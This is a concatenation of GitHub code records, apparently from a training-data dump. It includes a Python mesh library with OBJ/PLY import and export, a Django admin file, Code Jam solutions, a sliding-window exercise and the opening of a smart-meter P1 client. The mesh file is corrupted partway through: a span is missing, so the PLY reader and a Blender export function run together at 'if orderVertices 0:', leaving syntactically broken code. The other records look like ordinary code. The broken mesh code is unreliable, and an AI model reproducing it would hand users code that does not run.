name = ''):\n self.name = name\n self.vertices = []\n self.vertices_colors = []\n self.vertices_normals = []\n self.vertices_texcoords = []\n self.indices = []\n self.indices_normals = []\n self.indices_texcoords= []\n self.edge_indices = []\n self.edge_color = []\n self.materials = []\n\n def add( self, mesh ):\n offset = len(self.vertices)\n\n self.vertices.extend(mesh.vertices)\n self.vertices_colors.extend(mesh.vertices_colors)\n self.vertices_normals.extend(mesh.vertices_normals)\n self.vertices_texcoords.extend(mesh.vertices_texcoords)\n\n for i in range(len(mesh.indices)):\n self.indices.append( offset + mesh.indices[i] );\n\n for i in range(len(mesh.materials)):\n index = offset + mesh.materials[i][0]\n mat = mesh.materials[i][1]\n self.addMaterial( mat, index )\n\n # VERTICES\n\n def addVertex( self, v ):\n if isinstance(v, np.ndarray):\n self.vertices.append( v.copy() )\n else:\n self.vertices.append( np.array(v) )\n\n def totalVertices( self ):\n return len(self.vertices)\n\n def vertexString( self, index ):\n return '%f %f %f' % (self.vertices[index][0], self.vertices[index][1], self.vertices[index][2])\n\n # TEXCOORDS\n\n def addTexCoord( self, vt ):\n if isinstance(vt, np.ndarray):\n self.vertices_texcoords.append( vt.copy() )\n else:\n self.vertices_texcoords.append( np.array(vt) )\n\n def addTexCoordIndex( self, index ):\n self.indices_texcoords.append( index );\n\n def addTexCoordTriangle( self, i1, i2, i3 ):\n self.addTexCoordIndex( i1 )\n self.addTexCoordIndex( i2 )\n self.addTexCoordIndex( i3 )\n\n def texCoordString( self, index ):\n return ' %f %f' % (self.vertices_texcoords[index][0], self.vertices_texcoords[index][1])\n\n # NORMALS\n\n def addNormal( self, vn ):\n if isinstance(vn, np.ndarray):\n self.vertices_normals.append( vn.copy() )\n else:\n self.vertices_normals.append( np.array(vn) )\n\n def addNormalIndex( self, index ):\n self.indices_normals.append( index )\n\n def addNormalTriangle( self, i1, i2, i3 ):\n self.addNormalIndex( i1 )\n self.addNormalIndex( i2 )\n self.addNormalIndex( i3 )\n\n def normalString( self, index):\n n = self.vertices_normals[index]\n return ' %f %f %f' % (n[0], n[1], n[2])\n\n # COLORS\n\n def addColor( self, vc ):\n if isinstance(vc, basestring) or isinstance(vc, str):\n vc = vc.lstrip('#')\n lv = len(vc)\n color = tuple(int(vc[i:i + lv // 3], 16) for i in range(0, lv, lv // 3))\n self.vertices_colors.append( [color[0], color[1], color[2]] )\n elif isinstance(vc, np.ndarray):\n self.vertices_colors.append( vc.copy() )\n else:\n self.vertices_colors.append( np.array(vc) )\n\n def colorString( self, index, alpha = True ):\n if len(self.vertices_colors[index]) == 3:\n return ' %i %i %i' % (self.vertices_colors[index][0], self.vertices_colors[index][1], self.vertices_colors[index][2])\n elif len(self.vertices_colors[index]) == 4:\n if alpha:\n return ' %f %f %f %f' % (self.vertices_colors[index][0], self.vertices_colors[index][1], self.vertices_colors[index][2], self.vertices_colors[index][3])\n else:\n return ' %f %f %f' % (self.vertices_colors[index][0], self.vertices_colors[index][1], self.vertices_colors[index][2])\n\n # EDGES\n\n def addEdge( self, i1, i2, color = None ):\n self.edge_indices.append( i1 );\n self.edge_indices.append( i2 );\n if color:\n self.edge_color.append( color )\n\n def totalEdges( self ):\n return int(len(self.edge_indices)/2)\n\n def edgeString( self, number ):\n v1 = self.edge_indices[number*2]\n v2 = self.edge_indices[number*2+1]\n\n string = '%i %i' % (v1, v2)\n\n if len(self.edge_color) > 0:\n if 
len(self.edge_color[number]) == 3:\n string += ' %i %i %i' % (self.edge_color[number][0], self.edge_color[number][1], self.edge_color[number][2])\n elif len(self.edge_color[number]) == 4:\n string += ' %f %f %f %f' % (self.edge_color[number][0], self.edge_color[number][1], self.edge_color[number][2], self.edge_color[number][3])\n \n return string\n\n # TRIANGLES / FACES\n\n def addIndex( self, index ):\n self.indices.append( index )\n\n def totalIndices( self ):\n return len(self.indices)\n\n def addTriangle( self, i1, i2, i3 ):\n self.addIndex( i1 )\n self.addIndex( i2 )\n self.addIndex( i3 )\n\n def triangleString( self, index ):\n v1 = self.indices[index*3+0]\n v2 = self.indices[index*3+1]\n v3 = self.indices[index*3+2]\n return ' %i %i %i' % (v1, v2, v3)\n\n def totalFaces( self ):\n return int(len(self.indices)/3)\n\n def faceString( self, number ):\n v1 = vt1 = vn1 = self.indices[number*3] + 1\n v2 = vt2 = vn2 = self.indices[number*3+1] + 1\n v3 = vt3 = vn3 = self.indices[number*3+2] + 1\n\n if len(self.indices_texcoords) > 0:\n vt1 = self.indices_texcoords[number*3] + 1\n vt2 = self.indices_texcoords[number*3+1] + 1\n vt3 = self.indices_texcoords[number*3+2] + 1\n\n if len(self.indices_normals) > 0:\n vn1 = self.indices_normals[number*3] + 1\n vn2 = self.indices_normals[number*3+1] + 1\n vn3 = self.indices_normals[number*3+2] + 1\n\n if len(self.vertices_texcoords) > 0:\n if len(self.vertices_normals) > 0:\n return ' %i/%i/%i %i/%i/%i %i/%i/%i' % (v1, vt1, vn1, v2, vt2, vn2, v3, vt3, vn3)\n else:\n return ' %i/%i %i/%i %i/%i' % (v1, vt1, v2, vt2, v3, vt3)\n elif len(self.vertices_normals) > 0:\n return ' %i//%i %i//%i %i//%i' % (v1, vn1, v2, vn2, v3, vn3)\n else:\n return ' %i %i %i' % (v1, v2, v3)\n\n # MATERIAL\n\n def addMaterial( self, mat, index = None ):\n if index == None:\n index = len(self.vertices)\n self.materials.append( [index, mat] )\n\n # OPERATIONS\n\n def clear( self ):\n self.vertices = []\n self.vertices_colors = []\n self.vertices_normals = []\n self.vertices_texcoords = []\n\n self.indices = []\n self.indices_normals = []\n self.indices_texcoords= []\n\n self.edge_indices = []\n self.edge_color = []\n\n self.offset = 0\n\n def invertNormals( self ):\n # tig: flip face(=triangle) winding order, so that we are consistent with all other ofPrimitives.\n # i wish there was a more elegant way to do this, but anything happening before 'split vertices'\n # makes things very, very complicated.\n for i in range(0, len(self.indices))[::3]:\n tmp = self.indices[i+1]\n self.indices[i+1] = self.indices[i+2]\n self.indices[i+2] = tmp\n\n for i in range(0, len(self.vertices_normals)):\n self.vertices_normals[i] = np.array(self.vertices_normals[i]) * -1.\n\n def flatNormals( self ):\n # get copy original mesh data\n numIndices = len(self.indices)\n indices = self.indices\n verts = self.vertices\n texCoords = self.vertices_texcoords\n colors = self.vertices_colors\n \n # remove all data to start from scratch\n self.clear();\n \n # add mesh data back, duplicating vertices and recalculating normals\n normal = []\n for i in range(0, numIndices):\n indexCurr = indices[i];\n \n if i % 3 == 0:\n indexNext1 = indices[i + 1]\n indexNext2 = indices[i + 2]\n\n e1 = verts[indexCurr] - verts[indexNext1]\n e2 = verts[indexNext2] - verts[indexNext1]\n t = np.cross(e1, e2) * -1.\n dist = sqrt(t[0] * t[0] + t[1] * t[1] + t[2] * t[2])\n normal = t / dist\n \n self.addIndex(i);\n self.addNormal(normal);\n \n if indexCurr < len(texCoords):\n self.addTexCoord(texCoords[indexCurr])\n \n if indexCurr 
< len(verts):\n                self.addVertex(verts[indexCurr])\n            \n            if indexCurr < len(colors):\n                self.addColor(colors[indexCurr])\n\n\n    def scale( self, scale ):\n        mat = mat4_scale(scale)\n        self.transform(mat)\n\n\n    def translateX( self, d ):\n        mat = mat4_translateX(d)\n        self.transform(mat)\n\n\n    def translateY( self, d ):\n        mat = mat4_translateY(d)\n        self.transform(mat)\n\n\n    def translateZ( self, d ):\n        mat = mat4_translateZ(d)\n        self.transform(mat)\n    \n\n    def translate( self, dir ):\n        mat = np.identity(4)\n\n        if isinstance( dir, (np.ndarray, np.generic) ):\n            if dir.shape[0] == 3:\n                mat = mat4_translate( dir ) \n            elif len(dir.shape) == 2 and dir.shape[1] == 4:\n                mat = dir\n        elif isinstance( dir, (list, tuple) ):\n            mat = mat4_translate( dir ) \n\n        self.transform( mat )\n\n\n    def rotateX( self, deg ):\n        mat = mat4_rotateX(deg)\n        self.rotate_mat4(mat)\n\n\n    def rotateY( self, deg ):\n        mat = mat4_rotateY(deg)\n        self.rotate_mat4(mat)\n\n\n    def rotateZ( self, deg ):\n        mat = mat4_rotateZ(deg)\n        self.rotate_mat4(mat)\n\n\n    def rotate_quat(self, quaternion):\n        mat = mat4_from_quat( quaternion)\n        self.rotate_mat4(mat)\n\n\n    def rotate_axis( self, angle, direction, point=None):\n        mat = mat4_rotate(angle, direction, point)\n        self.rotate_mat4(mat)\n\n\n    def rotate_axis_euler( self, ai, aj, ak, axes='sxyz'):\n        mat = mat4_from_euler(ai, aj, ak, axes)\n        self.rotate_mat4(mat)\n\n\n    def rotate_normal( self, normal, up=[0.0, 0.0, 1.0]):\n        self.rotate_from_A_to_B(vec3(up), vec3(normal))\n\n\n    def rotate_from_A_to_B( self, A_vec, B_vec):\n        mat = mat4_from_A_to_B(A_vec, B_vec)\n        self.rotate_mat4(mat)\n\n\n    def rotate_mat4( self, mat4 ):\n        self.transform( mat4 )\n        self.transform_normals( mat4 )\n\n    \n    def transform( self, mat ):\n        for i in range(len(self.vertices)):\n            self.vertices[i] = mat4_mult(mat, self.vertices[i])\n\n\n    def transform_normals( self, mat ):\n        for i in range(len(self.vertices_normals)):\n            self.vertices_normals[i] = mat4_mult(mat, self.vertices_normals[i])\n\n\n    def center( self ):\n        # shift the mesh so its bounding-box midpoint sits at the origin\n        bbox = boundingBox(self.vertices)\n        dx = bbox[3] - bbox[0]\n        dy = bbox[4] - bbox[1]\n        dz = bbox[5] - bbox[2]\n        self.translateX(-bbox[3] + dx * 0.5 )\n        self.translateY(-bbox[4] + dy * 0.5 )\n        self.translateZ(-bbox[5] + dz * 0.5 )\n\n
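    # Example (illustrative): mesh.center() recenters the geometry in place; chain it with the rotate*/translate* helpers above before exporting to OBJ or PLY.\n\n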
    # EXPORT/IMPORT\n\n    def toObj( self, file_name = None ):\n        lines = '# OBJ by Patricio Gonzalez Vivo\\n'\n\n        # Materials Library\n        if file_name != None and len(self.materials) > 0:\n            mat_lines = ''\n            mat_names = []\n            for mat in self.materials:\n                name = mat[1].name\n                if not name in mat_names:\n                    mat_names.append(name)\n                    mat_lines += mat[1].toMtl()\n\n            mat_filename = os.path.splitext(file_name)[0] + '.mtl'\n            file = open( mat_filename, 'w' )\n            file.write( mat_lines )\n            file.close()\n            lines += 'mtllib ' + os.path.basename(mat_filename) + '\\n'\n\n        # Name\n        if len(self.name) > 0:\n            lines += 'o ' + self.name + '\\n'\n\n        # Vertices (and optional color)\n        color = len(self.vertices_colors) > 0\n        for index in range( len(self.vertices) ):\n            lines += 'v ' + self.vertexString( index ) \n            if color:\n                lines += self.colorString( index, False )\n            lines += '\\n'\n\n        # Texture Coords\n        for index in range( len(self.vertices_texcoords) ):\n            lines += 'vt' + self.texCoordString( index ) + '\\n'\n\n        # Normals \n        for index in range( len(self.vertices_normals) ):\n            lines += 'vn' + self.normalString( index ) + '\\n'\n\n        # Faces\n        material_counter = 0\n        for index in range( self.totalFaces() ):\n            if material_counter < len(self.materials):\n                if self.materials[material_counter][0] <= self.indices[index*3] or self.materials[material_counter][0] <= self.indices[index*3+1] or self.materials[material_counter][0] <= self.indices[index*3+2]:\n                    lines += 'usemtl ' + self.materials[material_counter][1].name + '\\n'\n                    material_counter += 1\n                    lines += 's 1\\n'\n            lines += 'f' + self.faceString( index ) + '\\n'\n\n        if file_name:\n            file = open(file_name, 'w')\n            file.write( lines )\n            file.close()\n        else:\n            return lines\n\n    def fromObj( self, file_name ):\n        for line in open(file_name, 'r'):\n            # Skip comments\n            if line.startswith('#'):\n                continue\n\n            # Skip empty lines\n            if line == \"\":\n                continue\n            \n            values = line.split()\n\n            # Skip if there is not enough information\n            if len(values) < 2:\n                continue\n\n            type = values[0]\n            args = values[1:]\n\n            if type == 'v':\n                if len(args) == 3:\n                    v = list(map(float, args))\n                    self.addVertex(np.array(v))\n            elif type == 'vt':\n                if len(args) == 2:\n                    vt = list(map(float, args))\n                    self.addTexCoord(np.array(vt))\n            elif type == 'vn':\n                if len(args) == 3:\n                    vn = list(map(float, args))\n                    self.addNormal(np.array(vn))\n            elif type == 'f':\n                if len(args) == 3:\n                    A = list(map(int, args[0].split('/')))\n                    B = list(map(int, args[1].split('/')))\n                    C = list(map(int, args[2].split('/')))\n\n                    self.addTriangle(A[0]-1, B[0]-1, C[0]-1)\n\n                    # if (A[0] != A[1] != A[2]) or (B[0] != B[1] != B[2]) or (C[0] != C[1] != C[2]):\n                    self.addTexCoordTriangle(A[1]-1, B[1]-1, C[1]-1)\n                    self.addNormalTriangle(A[2]-1, B[2]-1, C[2]-1)\n                elif len(args) > 3:\n                    values = []\n\n                    for i in range(len(args)):\n                        values.append( list(map(int, args[i].split('/'))) )\n\n                    # Add first triangle\n                    self.addTriangle(values[0][0]-1, values[1][0]-1, values[2][0]-1)\n                    # if (values[0][0] != values[0][1] != values[0][2]) or (values[1][0] != values[1][1] != values[1][2]) or (values[2][0] != values[2][1] != values[2][2]):\n                    self.addTexCoordTriangle(values[0][1]-1, values[1][1]-1, values[2][1]-1)\n                    self.addNormalTriangle(values[0][2]-1, values[1][2]-1, values[2][2]-1)\n\n                    for i in range(3, len(args)):\n                        self.addTriangle(values[i-3][0]-1, values[i-1][0]-1, values[i][0]-1)\n                        # if (values[i-3][0] != values[i-3][1] != values[i-3][2]) or (values[i-1][0] != values[i-1][1] != values[i-1][2]) or (values[i][0] != values[i][1] != values[i][2]):\n                        self.addTexCoordTriangle(values[i-3][1]-1, values[i-1][1]-1, values[i][1]-1)\n                        self.addNormalTriangle(values[i-3][2]-1, values[i-1][2]-1, values[i][2]-1)\n\n    def toPly( self, file_name = None ):\n        lines = '''ply\nformat ascii 1.0\nelement vertex '''+str(len(self.vertices))+'''\nproperty float x\nproperty float y\nproperty float z\n'''\n        if len(self.vertices_normals) > 0:\n            lines += 'property float nx\\n'\n            lines += 'property float ny\\n'\n            lines += 'property float nz\\n'\n\n        if len(self.vertices_colors) > 0:\n            if len(self.vertices_colors[0]) == 3:\n                lines += 'property uchar red\\n'\n                lines += 'property uchar green\\n'\n                lines += 'property uchar blue\\n'\n            elif len(self.vertices_colors[0]) == 4:\n                lines += 'property float r\\n'\n                lines += 'property float g\\n'\n                lines += 'property float b\\n'\n                lines += 'property float a\\n'\n\n        if len(self.vertices_texcoords) > 0:\n            lines += 'property float texture_u\\n'\n            lines += 'property float texture_v\\n'\n\n        if len( self.indices ) > 2:\n            lines += 'element face '+str( self.totalFaces() )+'\\n'\n            lines += 'property list uchar int vertex_indices\\n'\n\n        if len( self.edge_indices ) > 1:\n            lines += 'element edge '+str( self.totalEdges() )+'\\n'\n            lines += 'property int32 vertex1\\n'\n            lines += 'property int32 vertex2\\n'\n            if len(self.edge_color) > 0:\n                if len(self.edge_color[0]) == 3:\n                    lines += 'property uchar 
red\\n'\n lines += 'property uchar green\\n'\n lines += 'property uchar blue\\n'\n elif len(self.edge_color[0]) == 4:\n lines += 'property float r\\n'\n lines += 'property float g\\n'\n lines += 'property float b\\n'\n lines += 'property float a\\n'\n\n lines += 'end_header\\n'\n for index in range( len(self.vertices) ):\n line = self.vertexString( index )\n if len(self.vertices_normals) > 0:\n line += self.normalString( index )\n if len(self.vertices_colors) > 0:\n line += self.colorString( index )\n if len(self.vertices_texcoords) > 0:\n line += self.texCoordString( index )\n \n lines += line+'\\n'\n\n if len( self.indices ) > 2:\n for t in range( self.totalFaces() ):\n lines += '3' + self.triangleString(t) + '\\n'\n\n if len( self.edge_indices ) > 1:\n for t in range( self.totalEdges() ):\n lines += self.edgeString(t) + '\\n'\n\n if file_name:\n file = open(file_name, 'w')\n file.write( lines )\n file.close()\n else:\n return lines\n\n def fromPly(self, file_name):\n lineNum = -1\n\n class Enum(set):\n def __getattr__(self, name):\n if name in self:\n return name\n raise AttributeError\n\n State = Enum([\"Header\", \"VertexDef\", \"FaceDef\", \"Vertices\", \"Normals\", \"Faces\"])\n state = State.Header\n\n orderVertices = -1\n orderIndices = -1\n\n expectedVertices = 0\n expectedFaces = 0\n\n vertexCoordsFound = 0\n colorCompsFound = 0\n texCoordsFound = 0\n normalsCoordsFound = 0\n\n currentVertex = 0\n currentFace = 0\n\n floatColor = False\n\n for line in open(file_name, 'r'):\n lineNum += 1\n # get rid of the new line\n line = line.rstrip()\n # print(str(lineNum) + \" \" + line)\n\n if lineNum == 0:\n if line != 'ply':\n print(\"wrong format, expecting 'ply'\")\n return\n elif lineNum == 1:\n if line != \"format ascii 1.0\":\n print(\"wrong format, expecting 'format ascii 1.0'\")\n return\n \n if 'comment' in line:\n continue\n\n # HEADER \n if (state==State.Header or state==State.FaceDef) and line.startswith('element vertex'):\n state = State.VertexDef\n orderVertices = max(orderIndices, 0)+1\n expectedVertices = int(line[15:])\n # print(state)\n # print(line[15:])\n continue;\n\n if (state==State.Header or state==State.VertexDef) and line.startswith('element face'):\n state = State.FaceDef\n orderIndices = max(orderVertices, 0)+1\n expectedFaces = int(line[13:])\n # print(state)\n # print(line[13:])\n continue\n\n # Vertex Def\n if state==State.VertexDef:\n\n if line.startswith('property float x') or line.startswith('property float y') or line.startswith('property float z'):\n vertexCoordsFound += 1\n # print('vertexCoordsFound ' + str(vertexCoordsFound))\n continue\n\n if line.startswith('property float nx') or line.startswith('property float ny') or line.startswith('property float nz'):\n normalsCoordsFound += 1\n # print('normalsCoordsFound ' + str(normalsCoordsFound))\n continue\n\n if line.startswith('property float r') or line.startswith('property float g') or line.startswith('property float b') or line.startswith('property float a'):\n colorCompsFound += 1\n # print('colorCompsFound ' + str(colorCompsFound))\n floatColor = True\n continue\n \n if line.startswith('property uchar red') or line.startswith('property uchar green') or line.startswith('property uchar blue') or line.startswith('property uchar alpha'):\n colorCompsFound += 1\n # print('colorCompsFound ' + str(colorCompsFound))\n floatColor = False\n continue\n\n if line.startswith('property float u') or line.startswith('property float v'):\n texCoordsFound += 1\n # print('texCoordsFound ' + str(texCoordsFound))\n 
continue\n\n            # if state==State.FaceDef and line.find('property list')!=0 and line!='end_header':\n            #     print('wrong face definition')\n\n            if line=='end_header':\n                # Check that all basic elements seem ok and healthy\n                if colorCompsFound > 0 and colorCompsFound < 3:\n                    print('data has color coordinates but not correct number of components. Found ' + str(colorCompsFound) + ' expecting 3 or 4')\n                    return\n\n                if normalsCoordsFound > 0 and normalsCoordsFound != 3:\n                    print('data has normal coordinates but not correct number of components. Found ' + str(normalsCoordsFound) + ' expecting 3')\n                    return\n\n                if expectedVertices == 0:\n                    print('mesh loaded has no vertices')\n                    return\n\n                if orderVertices == -1:\n                    orderVertices = 9999\n                if orderIndices == -1:\n                    orderIndices = 9999;\n\n                if orderVertices < orderIndices:\n                    state = State.Vertices\n                else:\n                    state = State.Faces\n\n                continue\n            \n            if state == State.Vertices:\n                values = line.split()\n\n                # Extract vertex\n                v = [0.0, 0.0, 0.0]\n                v[0] = float(values.pop(0))\n                v[1] = float(values.pop(0))\n                if vertexCoordsFound > 2:\n                    v[2] = float(values.pop(0))\n                self.addVertex(np.array(v))\n\n                # Extract normal\n                if normalsCoordsFound > 0:\n                    n = [0.0, 0.0, 0.0]\n                    n[0] = float(values.pop(0))\n                    n[1] = float(values.pop(0))\n                    n[2] = float(values.pop(0))\n                    self.addNormal(np.array(n))\n\n                # Extract color\n                if colorCompsFound > 0:\n                    c = [1.0, 1.0, 1.0, 1.0]\n
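                    # uchar colors arrive as 0-255, float colors as 0.0-1.0\n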
                    div = 255.0\n                    if floatColor:\n                        div = 1.0\n\n                    c[0] = float(values.pop(0))/div\n                    c[1] = float(values.pop(0))/div\n                    c[2] = float(values.pop(0))/div\n                    if colorCompsFound > 3:\n                        c[3] = float(values.pop(0))/div\n                    self.addColor(np.array(c))\n\n                # Extract UVs\n                if texCoordsFound > 0:\n                    uv = [0.0, 0.0]\n                    uv[0] = float(values.pop(0))\n                    uv[1] = float(values.pop(0))\n                    self.addTexCoord(np.array(uv))\n\n                if len(self.vertices) == expectedVertices:\n                    if orderVertices < orderIndices:\n                        state = State.Faces\n                    else:\n                        state = State.Vertices\n                continue\n\n            if state == State.Faces:\n                values = line.split()\n                numV = int(values.pop(0))\n\n                if numV != 3:\n                    print(\"face not a triangle\")\n\n                for i in range(numV):\n                    index = int(values.pop(0))\n                    self.addIndex( index )\n                    if normalsCoordsFound:\n                        self.addNormalIndex(index)\n                    if texCoordsFound:\n                        self.addTexCoordIndex(index)\n\n                if currentFace == expectedFaces:\n                    print(\"finish w indices\")\n                    if orderVertices 0:\n            uv_layer = blender_mesh.uv_layers.new()\n            for i, uv in enumerate(uv_layer.data):\n                index = self.indices[i]\n                uv.uv = self.vertices_texcoords[index]\n\n        # Vertex color per vertex *per polygon loop* \n        # Create vertex color layer and set values\n        if len(self.vertices_colors) > 0:\n            vcol_lay = blender_mesh.vertex_colors.new()\n            for i, col in enumerate(vcol_lay.data):\n                index = self.indices[i]\n                col.color[0] = self.vertices_colors[index][0]\n                col.color[1] = self.vertices_colors[index][1]\n                col.color[2] = self.vertices_colors[index][2]\n                col.color[3] = 1.0  # Alpha?\n        \n        # We're done setting up the mesh values, update mesh object and \n        # let Blender do some checks on it\n        blender_mesh.update()\n        blender_mesh.validate()\n\n        return blender_mesh\n\n","repo_name":"patriciogonzalezvivo/Meshes","sub_path":"Meshes/Mesh.py","file_name":"Mesh.py","file_ext":"py","file_size_in_byte":28108,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"61"} +{"seq_id":"8254285356","text":"\"\"\" This module registers the UserProfile administration \"\"\"\nfrom django.contrib import admin\nfrom .models import UserProfile\n\n\nclass UserProfileAdmin(admin.ModelAdmin):\n    \"\"\" Administration display list for the user \"\"\"\n    list_display = (\n        'user',\n        'full_name',\n        'email_address',\n        'phone_number',\n        'street_address1',\n        'town_or_city',\n        'postcode',\n        'country',\n        'receiving_newsletter',\n    )\n\n    ordering = ('first_name',)\n\n\nadmin.site.register(UserProfile, UserProfileAdmin)\n","repo_name":"KarolSliwka/ArcticSchool","sub_path":"profiles/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23421255991","text":"#!/usr/bin/python3\n\n#$Id:$\n\n# Google code jam 2014\n# problem 2\n\nimport time\nimport getopt\nimport sys\n\ndef print_timing(func):\n    def wrapper(*arg):\n        t1 = time.time()\n        res = func(*arg)\n        t2 = time.time()\n        print ('%s took %0.2f s' % (func.__name__, (t2-t1)))\n        return res\n    return wrapper\n\ndef usage():\n    print('''\n    Cookie Clicker Alpha (problem 2)\n\nOptions:\n-h (--help) \n-v (--verbose)\n''')\n\n\nif __name__ == \"__main__\":\n\n    verbose = False\n    fname = \"input.txt\"\n    # r is the standard cookie production per s\n    r = 2.0\n\n    if sys.version_info[0] < 3:\n        print(\"This script requires Python 3. (You are running %d.%d)\" % (\n            sys.version_info[0], sys.version_info[1])) \n        sys.exit()\n\n    try:\n        opts, args = getopt.getopt(sys.argv[1:], \"hvf:\",\n                                   [\"verbose\",\"help\",\"input=\"])\n    except getopt.GetoptError as err:\n        # print help information and exit:\n        print (str(err)) # will print something like \"option -a not recognized\"\n        usage()\n        sys.exit(2)\n\n    for o, a in opts:\n        if o in (\"-h\", \"--help\"):\n            usage()\n            sys.exit()\n        elif o in (\"-v\", \"--verbose\"):\n            verbose = True\n        elif o in (\"-f\", \"--input\"):\n            fname = a\n        else:\n            usage()\n            sys.exit()\n\n\n    # reading input\n    # first line: number of test cases. T cases follow\n    # each test case:\n    # one line containing three floats C, F, X\n    # C : costs of a farm\n    # F : farm production\n    # X : cookies needed to win\n    # sample:\n    # 4\n    # 30.0 1.0 2.0\n    # 30.0 2.0 100.0\n    # 30.50000 3.14159 1999.19990\n    # 500.0 4.0 2000.0\n\n    f = open(fname, \"rt\")\n    ncases = int(f.readline())\n    if verbose:\n        print(\"%s: %d cases.\" % (fname, ncases))\n\n    for c in range(ncases):\n        C, F, X = [float(x) for x in f.readline().split()] \n\n        if verbose:\n            print(\"Case %d: C: %.5f F: %.5f X: %.5f\" % (c, C, F, X))\n\n        # solve it: \n        # First, how many farms are needed can be determined by that \n        # expression: \n        # X/C - r/F = n \n        # The smallest integer <= n is the number of farms needed in \n        # optimum scenario\n\n        # could be a rounding issue here\n
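        # Derivation: buying farm k+1 pays off while C/(r + k*F) < X*F/((r + k*F)*(r + (k+1)*F)), i.e. while k + 1 < X/C - r/F.\n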
        n = max(0, int(X/C - r/F))\n\n        if verbose:\n            print(\"Will need %d farms\" % (n))\n\n        # now, calculate the time needed based on n farms\n        # example for 3 farms:\n        # total = C/2 + C/(2+1*F)+ C/(2+2*F) + X/(2+3*F)\n        total = 0.0\n        for i in range(n):\n            total = total + C/(r+i*F)\n\n        total = total + X / (r+n*F)\n\n        # output\n        print (\"Case #%d: %.7f\" % (c+1, total))\n\n\n    \n\n\n\n    \n\n    \n\n\n\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/1221.py","file_name":"1221.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23497818771","text":"test_cases = int(raw_input().strip())\ninputs = []\noutputs = []\n\ndef reverse_negate(s):\n    reversed_string = s[::-1]\n    new_str = ''\n    for char in reversed_string:\n        if char == '+':\n            new_str += '-'\n        elif char == '-':\n            new_str += '+'\n    return new_str\n\nfor t in xrange(test_cases):\n    s = raw_input().strip()\n    inputs.append(s)\n\nfor s in inputs:\n    if s == len(s) * s[0]:\n        if s[0] == '+':\n            outputs.append(0)\n        else:\n            outputs.append(1)\n        continue\n\n    last_index = s.rfind('-')\n    s = s[:last_index+1]\n    all_same = False\n    counter = 0\n    while all_same == False:\n        if s[:1] == '+':\n            for ctr,char in enumerate(s):\n                if char == '-':\n                    break\n            s = s.replace('+', '-', ctr)\n            counter += 1\n\n        s = reverse_negate(s)\n        last_index = s.rfind('-')\n        if last_index != -1:\n            s = s[:last_index+1]\n        counter += 1\n        all_same = ((s == len(s) * s[0]) and s[0] == '+')\n    outputs.append(counter)\n\ntext_file = open('/Users/mac/Downloads/output.txt', 'w')\nfor counter,o in enumerate(outputs):\n    output_str = 'Case #%s: %s' % (counter+1, o)\n    text_file.write(output_str)\n    text_file.write('\\n')\ntext_file.close()\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_178/3354.py","file_name":"3354.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16481004823","text":"from collections import deque\nimport sys\ninput = sys.stdin.readline\n\nN, L = map(int, input().split())\n#arr = [0] + list(map(int, input().split()))\narr = list(map(int, input().split()))\n\n# index 0 is the front of the deque\nmyDeque = deque()\n\nfor i in range(N):\n    tmp = arr[i]\n    while myDeque and myDeque[-1]>tmp:\n        myDeque.pop()\n    myDeque.append(tmp)\n\n    # once the index passes the window size, compare with arr and popleft\n    if i>=L and myDeque[0]==arr[i-L]:\n        myDeque.popleft()\n    \n    print(myDeque[0], end=' ')\n\n
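# Each value is appended and popped at most once, so the whole scan runs in O(N).\n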
\"\"\" Time limit exceeded (previous attempt)\nstartIdx = 1-L+1\nif startIdx<=0: startIdx = 1\nendIdx = 1\n\nminVal = min(arr[startIdx:endIdx+1])\nprint(minVal,end=' ')\n\nfor i in range(2, len(arr)):\n    startIdx = i-L+1\n    if startIdx<=0: startIdx = 1\n    endIdx = i\n\n    if arr[endIdx]<=minVal : minVal = arr[endIdx]\n    if arr[startIdx-1] == minVal : minVal = min(arr[startIdx:endIdx+1])\n\n    print(minVal, end=' ')\n\n\"\"\"","repo_name":"juyeeeeon/CodingTest_Python","sub_path":"03자료구조/03_4_슬라이딩윈도우/P11003_최솟값찾기.py","file_name":"P11003_최솟값찾기.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19675783382","text":"\"\"\"\nReceive P1-data from slimmemeter via UART and store into Prometheus to be presented with Grafana.\n\"\"\"\n\nimport sys\nimport signal\nimport logging\n\nfrom serial import Serial, EIGHTBITS, PARITY_NONE, STOPBITS_ONE\n\nimport prometheus_client as PrometheusClient\nfrom p1datametrics import P1DataMetrics\n\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(levelname)s - %(message)s')\n\n\nclass P1DataClient(object):\n    \"\"\"P1DataClient class\"\"\"\n\n    def __init__(self, serial):\n        self.serial = Serial(serial, 115200,\n                             bytesize=EIGHTBITS, parity=PARITY_NONE, stopbits=STOPBITS_ONE)\n\n        self.tariff1_delivered_reading_gauge = PrometheusClient.Gauge(\n            'tariff1_delivered_reading', 'tariff-1 delivered reading', ['elec_eid'])\n        self.tariff2_delivered_reading_gauge = PrometheusClient.Gauge(\n            'tariff2_delivered_reading', 'tariff-2 delivered reading', ['elec_eid'])\n        self.power_delivered_gauge = PrometheusClient.Gauge(\n            'power_delivered', 'Power delivered', ['elec_eid', 'tariff_indicator'])\n        self.l1_power_delivered_gauge = PrometheusClient.Gauge(\n            'l1_power_delivered', 'L1 Power delivered', ['elec_eid', 'tariff_indicator'])\n        self.l2_power_delivered_gauge = PrometheusClient.Gauge(\n            'l2_power_delivered', 'L2 Power delivered', ['elec_eid', 'tariff_indicator'])\n        self.l3_power_delivered_gauge = PrometheusClient.Gauge(\n            'l3_power_delivered', 'L3 Power delivered', ['elec_eid', 'tariff_indicator'])\n        self.gas_delivered_reading_gauge = PrometheusClient.Gauge(\n            'gas_delivered_reading', 'Gas delivered', ['gas_eid'])\n\n        PrometheusClient.start_http_server(8000)\n\n    def receive(self):\n        \"\"\"receive p1 data\"\"\"\n\n        p1data = ''\n        while True:\n            p1data_line = 